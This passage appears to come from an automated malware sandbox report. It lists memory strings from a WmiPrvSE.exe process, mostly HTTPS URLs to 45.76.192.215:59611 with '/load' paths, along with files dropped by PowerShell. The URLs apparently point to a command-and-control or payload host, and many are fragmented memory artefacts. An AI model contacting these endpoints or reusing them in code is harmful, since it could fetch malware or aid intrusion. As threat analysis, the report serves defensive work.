00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/KX0J
                Source: WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/MFvJ&
                Source: WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/YF
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/ad
                Source: WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/ad5F.J
                Source: WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/adGFxJ(
                Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/kFTJ
                Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/kX
                Source: WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load
                Source: WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/
                Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/BFsJ
                Source: WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/GFxJ(
                Source: WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/adMFvJ&
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/load
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/loadGFxJ(
                Source: WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load.215:59611/oad
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load21
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load5F.J
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/load;F$J
                Source: WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadCY
                Source: WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadGFxJ(
                Source: WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadMFvJ&
                Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadYF
                Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadcs
                Source: WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadgY
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1606499631.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1650092146.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadkFTJ
                Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733263656.00000000008B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadkY
                Source: WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadnY
                Source: WmiPrvSE.exe, 00000017.00000002.3871035138.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/loadv
                Source: WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/oad
                Source: WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/oad5F.J
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/oad;F$J
                Source: WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/qFbJ
                Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/sX(J
                Source: WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/vFoJ
                Source: powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1578339616.0000000004B23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EF7234CDBB1649702229F955C785C39FJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49855FCDFA62840A2838AEF1EFAC3C9BJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139Jump to dropped file
